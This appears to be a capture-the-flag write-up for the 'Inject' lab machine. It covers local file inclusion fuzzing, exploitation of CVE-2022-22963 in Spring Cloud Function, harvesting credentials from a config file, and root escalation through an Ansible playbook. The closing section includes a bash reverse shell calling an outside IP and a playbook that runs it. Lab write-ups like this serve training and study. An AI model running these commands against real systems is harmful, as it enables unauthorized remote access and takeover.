Inject

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Nikto:

GoBuster Scan:

Homepage:

/upload

/register

/blogs

/release_notes

Uploaded jpg:

WFuzz LFI Scan:
CMD: wfuzz -c -t 50 –hc 404,500 –hh 0 -z file,/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt http://10.129.230.151:8080/show_image?img=FUZZ

Shows folder listing as well:

Reading /var/www/WebApp/pom.xml shows that SpringFrameWork cloud is ver 3.2.2
3.2.2 is vulnerable
CVE: CVE-2022-22963
Info: https://spring.io/security/cve-2022-22963
PoC: https://github.com/dinosn/CVE-2022-22963

Used the poc to ping:

Initial Foothold

Uploaded a revshell.sh to /dev/shm, chmod to +x and executed. Received reverse shell (bash contain bash reverse shell command).

Created an uploaded ssh keys and ssh as frank.

Found user/pass for phil in /home/frank/.m2/settings.xml

User.txt Proof Screenshot

Privilege Escalation

/opt/automation/tasks has a ansible playbook in it

Looks like root is running the automation:

https://gtfobins.github.io/gtfobins/ansible-playbook/

Created a new playbook that runs the revshell script from before
playbook_2.yml

- hosts: localhost
  tasks: [shell: /dev/shm/revshell.sh]

Contents of revshell.sh

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.21/8888 0>&1

RootScreenshot Here: